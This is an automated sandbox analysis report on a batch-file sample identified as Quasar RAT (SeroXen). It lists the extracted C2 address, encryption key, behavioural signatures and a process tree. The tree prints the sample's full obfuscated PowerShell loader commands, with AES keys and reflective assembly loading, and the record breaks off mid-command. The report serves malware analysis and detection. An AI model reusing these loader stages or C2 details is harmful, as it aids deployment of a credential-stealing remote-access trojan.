Analysis

  • max time kernel
    101s
  • max time network
    148s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    28-11-2024 17:31

General

  • Target

    Uni.bat

  • Size

    10.4MB

  • MD5

    2c35e3c096365f1e1ad3bcc4de8574f7

  • SHA1

    5e96223c4626c43a1c3306dbb76d94881ba6abbd

  • SHA256

    91c8ec0b835f0470ee1a8b3c0c18b412c2883e3621e684cf273f3120252a8146

  • SHA512

    ccccc2f5a9d80a8fc1c8431dda01973f8b81832e1e77a1e42579beb3521febbd51d9d11f58782ee68d381235f902853a1f6597de2e6ca4b15cda2a66896f4f7c

  • SSDEEP

    49152:PqzgPmL6ky1xm3CCeGx8pb8y2qsqnnjh3WhZKEP7ciaTCfuoeKPtyT5YAv6cKoTW:a

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

v15.4.5 | SeroXen

C2

147.185.221.23:58175

Mutex

a00acb06-91e4-48b0-99a0-b2768c5ea752

Attributes
  • encryption_key

    E9B24DC5A9D33874B0626389429DD789286126DC

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    230

  • startup_key

    $sxr-seroxen

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
  • Detected Nirsoft tools 1 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 12 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Hide Artifacts: Hidden Window 1 TTPs 11 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 11 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 54 IoCs
  • Modifies registry class 24 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 42 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1076
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{24c869e8-a2a3-48b3-8fd5-d2cdb7168a09}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4540
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{46764361-e156-4387-8588-aedc3b4c0936}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2220
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{72b1edd5-1a84-460b-aca0-910200906fca}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2044
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{57c575f3-2f87-4464-88dc-1c2d9bb968f5}
        2⤵
          PID:1636
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{9fdd3ef3-f3ee-481a-a065-ff66697c082e}
          2⤵
            PID:3136
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{9d2f9405-64cc-4d55-97bf-13be11e2c231}
            2⤵
              PID:5476
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{cd8ad107-2460-49f5-8d40-bbf7c081468a}
              2⤵
                PID:1668
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{4fbb84a0-dc40-474e-ae34-0ee46bdfe0ea}
                2⤵
                  PID:2324
                • C:\Windows\explorer.exe
                  explorer.exe
                  2⤵
                  • Boot or Logon Autostart Execution: Active Setup
                  • Enumerates connected drives
                  • Checks SCSI registry key(s)
                  • Modifies registry class
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:5128
                • C:\Windows\explorer.exe
                  explorer.exe
                  2⤵
                    PID:4036
                  • C:\Windows\explorer.exe
                    explorer.exe
                    2⤵
                      PID:2472
                    • C:\Windows\explorer.exe
                      explorer.exe
                      2⤵
                        PID:5848
                      • C:\Windows\explorer.exe
                        explorer.exe
                        2⤵
                          PID:1572
                        • C:\Windows\explorer.exe
                          explorer.exe
                          2⤵
                            PID:4328
                          • C:\Windows\explorer.exe
                            explorer.exe
                            2⤵
                              PID:1520
                            • C:\Windows\explorer.exe
                              explorer.exe
                              2⤵
                                PID:5300
                              • C:\Windows\explorer.exe
                                explorer.exe
                                2⤵
                                  PID:5168
                              • C:\Windows\system32\lsass.exe
                                C:\Windows\system32\lsass.exe
                                1⤵
                                  PID:684
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                  1⤵
                                    PID:960
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                    1⤵
                                      PID:412
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                      1⤵
                                        PID:436
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                        1⤵
                                          PID:732
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                          1⤵
                                            PID:1000
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                            1⤵
                                              PID:1104
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                              1⤵
                                                PID:1180
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                1⤵
                                                • Drops file in System32 directory
                                                PID:1252
                                                • C:\Windows\system32\taskhostw.exe
                                                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                  2⤵
                                                    PID:2948
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                  1⤵
                                                    PID:1272
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                    1⤵
                                                      PID:1360
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                      1⤵
                                                        PID:1408
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                        1⤵
                                                          PID:1420
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                          1⤵
                                                            PID:1524
                                                            • C:\Windows\system32\sihost.exe
                                                              sihost.exe
                                                              2⤵
                                                              • Modifies registry class
                                                              PID:2792
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                            1⤵
                                                              PID:1564
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                              1⤵
                                                                PID:1600
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                1⤵
                                                                  PID:1688
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                  1⤵
                                                                    PID:1760
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                    1⤵
                                                                      PID:1812
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                      1⤵
                                                                        PID:1880
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                        1⤵
                                                                          PID:1940
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                            PID:1948
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:1964
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                              1⤵
                                                                                PID:1732
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                1⤵
                                                                                  PID:2072
                                                                                • C:\Windows\System32\spoolsv.exe
                                                                                  C:\Windows\System32\spoolsv.exe
                                                                                  1⤵
                                                                                    PID:2208
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                    1⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2280
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                    1⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2288
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                    1⤵
                                                                                      PID:2452
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                      1⤵
                                                                                        PID:2596
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                        1⤵
                                                                                          PID:2604
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                          1⤵
                                                                                            PID:2812
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                            1⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:2876
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                            1⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2920
                                                                                          • C:\Windows\sysmon.exe
                                                                                            C:\Windows\sysmon.exe
                                                                                            1⤵
                                                                                              PID:2968
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                              1⤵
                                                                                                PID:3012
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                1⤵
                                                                                                  PID:3028
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                  1⤵
                                                                                                    PID:2532
                                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3272
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                      1⤵
                                                                                                        PID:3600
                                                                                                      • C:\Windows\Explorer.EXE
                                                                                                        C:\Windows\Explorer.EXE
                                                                                                        1⤵
                                                                                                          PID:3684
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                                            2⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:560
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              3⤵
                                                                                                                PID:4304
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
                                                                                                                "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $WOPSU = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($hZSOM in $WOPSU) { if ($hZSOM.StartsWith(':: ')) { $WUBQW = $hZSOM.Substring(3); break; }; };$TltnC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($WUBQW);$hiWzu = New-Object System.Security.Cryptography.AesManaged;$hiWzu.Mode = [System.Security.Cryptography.CipherMode]::CBC;$hiWzu.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$hiWzu.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R+7km1Kng+Tk/g22yIYfJi3KNN0y7ahu3CCAqlAFHj4=');$hiWzu.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W5Ypky4J6VtH280ftgrmGw==');$UBSjF = $hiWzu.CreateDecryptor();$TltnC = $UBSjF.TransformFinalBlock($TltnC, 0, $TltnC.Length);$UBSjF.Dispose();$hiWzu.Dispose();$qWlQq = New-Object System.IO.MemoryStream(, $TltnC);$wGZkP = New-Object System.IO.MemoryStream;$nddmN = New-Object System.IO.Compression.GZipStream($qWlQq, [IO.Compression.CompressionMode]::Decompress);$nddmN.CopyTo($wGZkP);$nddmN.Dispose();$qWlQq.Dispose();$wGZkP.Dispose();$TltnC = $wGZkP.ToArray();$zfuyh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($TltnC);$qykKF = $zfuyh.EntryPoint;$qykKF.Invoke($null, (, [string[]] ('')))
                                                                                                                3⤵
                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                • Checks computer location settings
                                                                                                                • Deletes itself
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Drops file in Windows directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:3476
                                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                  4⤵
                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1136
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join 